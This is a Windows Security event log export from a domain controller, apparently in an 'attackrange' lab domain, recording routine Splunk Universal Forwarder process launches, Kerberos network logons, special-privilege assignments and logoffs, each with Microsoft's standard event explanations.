Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265166
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265167
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CB268
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54264
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:01:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265169
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265168
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x88c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265170
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265172
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CC5A8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65034
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265171
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CC5A8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:01:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265173
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8CB268
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:01:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265174
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CC5A8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:01:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265177
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CD3AC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:01:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265176
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CD3AC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65043
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:01:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265175
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8CD3AC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:02:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265178
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265180
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1960
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265179
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x280
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265181
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265183
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265182
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265184
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bc4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265190
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D0497
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265189
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D0497
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65053
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265188
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D0497
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265187
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D042B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:02:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265186
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D042B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65052
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
